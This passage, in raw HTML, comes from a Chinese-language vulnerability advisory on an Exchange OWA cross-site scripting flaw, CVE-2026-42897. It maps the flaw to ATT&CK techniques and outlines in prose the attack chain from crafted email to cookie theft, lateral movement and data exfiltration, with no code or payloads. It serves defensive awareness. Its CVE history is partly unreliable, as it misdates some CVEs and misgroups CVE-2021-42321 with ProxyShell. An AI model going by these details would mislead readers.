style="overflow-wrap: break-word;list-style-type: disc;padding-left: 2em;margin-left: 0px;margin-top: 0.5em;margin-bottom: 0.5em;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">T1189：路过式下载</span></strong><span leaf="">（初始访问）</span></span></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">T1059.007：JavaScript执行</span></strong><span leaf="">（命令和脚本执行）</span></span></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">T1566.002：鱼叉式钓鱼邮件</span></strong><span leaf="">（网络钓鱼）</span></span></li></ul><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">攻击路径还原</span></h3><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">结合多来源情报，该漏洞的完整攻击链路如下：</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">第一步：投递阶段</span></strong></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">攻击者构造包含恶意载荷的特殊邮件。这里的&#34;特殊&#34;在于，邮件内容中嵌入了精心设计的脚本代码，当邮件通过OWA界面渲染时，这些代码会存在于页面DOM中。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">第二步：触发阶段</span></strong></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">目标用户使用Outlook Web Access打开邮件。需要注意的是，漏洞触发可能需要特定的用户交互条件，如鼠标悬停、点击邮件中的某个元素，或页面滚动到特定位置。这解释了为什么部分来源提到&#34;under certain conditions&#34;。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">第三步：代码执行</span></strong></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">当条件满足时，攻击者注入的JavaScript代码在用户浏览器上下文中执行。这意味着恶意代码拥有与当前登录用户相同的会话权限，可以：</span></p><ul style="overflow-wrap: break-word;list-style-type: disc;padding-left: 2em;margin-left: 0px;margin-top: 0.5em;margin-bottom: 0.5em;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><span leaf="">读取用户可见的所有邮件内容</span></span></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><span leaf="">窃取会话Cookie，实现会话劫持</span></span></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><span leaf="">提取OWA界面中的敏感数据</span></span></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><span leaf="">构造进一步的攻击载荷</span></span></li></ul><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">第四步：后继行动</span></strong></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">成功利用后，攻击者可进一步实施：</span></p><ul style="overflow-wrap: break-word;list-style-type: disc;padding-left: 2em;margin-left: 0px;margin-top: 0.5em;margin-bottom: 0.5em;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><span leaf="">横向移动至企业内网其他系统</span></span></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><span leaf="">凭据窃取和权限提升</span></span></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><span leaf="">数据外泄</span></span></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><span leaf="">部署后续攻击工具</span></span></li></ul><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">漏洞技术特征对比</span></h3><table style="overflow-wrap:break-word;color:rgb(43, 48, 59);border-collapse:collapse;margin:1.5em 8px;font-family:-apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size:16px;font-style:normal;font-variant-ligatures:normal;font-variant-caps:normal;font-weight:400;letter-spacing:normal;orphans:2;text-align:start;text-transform:none;widows:2;word-spacing:0px;-webkit-text-stroke-width:0px;white-space:normal;text-decoration-thickness:initial;text-decoration-style:initial;text-decoration-color:initial;width:556px;"><thead><tr style="overflow-wrap: break-word;"><th data-colwidth="191" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">属性</span></p></th><th data-colwidth="365" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">详情</span></p></th></tr></thead><tbody><tr style="overflow-wrap: break-word;"><td data-colwidth="191" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">CVE编号</span></p></td><td data-colwidth="365" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><span style="overflow-wrap: break-word;"><span leaf="">CVE-2026-42897</span></span></td></tr><tr style="overflow-wrap: break-word;"><td data-colwidth="191" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">漏洞类型</span></p></td><td data-colwidth="365" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">欺骗漏洞 + 跨站脚本(XSS)</span></p></td></tr><tr style="overflow-wrap: break-word;"><td data-colwidth="191" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">CVSS评分</span></p></td><td data-colwidth="365" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">8.1（高危）</span></p></td></tr><tr style="overflow-wrap: break-word;"><td data-colwidth="191" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">影响范围</span></p></td><td data-colwidth="365" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">Exchange Server SE/2016/2019（本地部署）</span></p></td></tr><tr style="overflow-wrap: break-word;"><td data-colwidth="191" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">利用前提</span></p></td><td data-colwidth="365" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">需向用户发送特制邮件</span></p></td></tr><tr style="overflow-wrap: break-word;"><td data-colwidth="191" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">触发条件</span></p></td><td data-colwidth="365" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">用户在OWA中打开邮件并满足特定交互</span></p></td></tr><tr style="overflow-wrap: break-word;"><td data-colwidth="191" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">Exchange Online</span></p></td><td data-colwidth="365" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">不受影响</span></p></td></tr></tbody></table><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">威胁态势评估</span></h2><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">野外利用确认</span></h3><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">该漏洞已被明确标注为&#34;在野外被积极利用&#34;。微软安全响应中心发布的官方公告也明确指出这一点，这与部分报道中&#34;尚未被CISA KEV收录&#34;的描述并不矛盾——CISA的收录存在一定滞后性，但漏洞的实际危害已经发生。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">该漏洞由匿名安全研究人员发现并私下报告，而非通过微软的漏洞赏金计划或公开渠道披露。这种报告方式往往意味着漏洞信息可能已在更广泛的范围内流传，攻击者可能比公众更早知晓相关细节。</span></p><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">历史脉络与威胁演进</span></h3><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span style="overflow-wrap: break-word;"><span leaf="">CVE-2026-42897</span></span><span leaf="">并非微软Exchange Server首次出现的高危漏洞。回顾近年来Exchange Server的安全事件：</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">2019-2020年：Exchange的黑暗时期</span></strong></p><ul style="overflow-wrap: break-word;list-style-type: disc;padding-left: 2em;margin-left: 0px;margin-top: 0.5em;margin-bottom: 0.5em;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><span style="overflow-wrap: break-word;"><span leaf="">CVE-2020-0688</span></span><span leaf="">：Exchange控制面板远程代码执行</span></span></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><span style="overflow-wrap: break-word;"><span leaf="">CVE-2021-26855</span></span><span leaf="">至</span><span style="overflow-wrap: break-word;"><span leaf="">CVE-2021-27065</span></span><span leaf="">（ProxyLogon）：大规模APT攻击利用</span></span></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><span style="overflow-wrap: break-word;"><span style="overflow-wrap: break-word;"><span leaf="">CVE-2021-34473</span></span><span leaf="">至</span><span style="overflow-wrap: break-word;"><span leaf="">CVE-2021-42321</span></span><span leaf="">（ProxyShell）：类似攻击链的演进</span></span></li></ul><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">2021-2024年：持续高压</span></strong></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">据HEAL Security报告，CISA数据显示过去五年间已有</span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">19个</span></strong><span leaf="">微软Exchange Server漏洞被添加到已知被利用漏洞目录，其中</span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">14个</span></strong><span leaf="">被明确用于勒索软件攻击。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span style="overflow-wrap: break-word;"><span leaf="">CVE-2026-42897</span></span><span leaf="">的攻击模式与早期的ProxyLogon、ProxyShell漏洞存在相似性——都是通过OWA界面作为入口，利用服务器端组件的处理缺陷实现攻击链的延伸。这种&#34;邮件入口+服务端利用&#34;的组合拳，一直是APT组织和经济利益驱动型攻击者的最爱。</span></p><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: 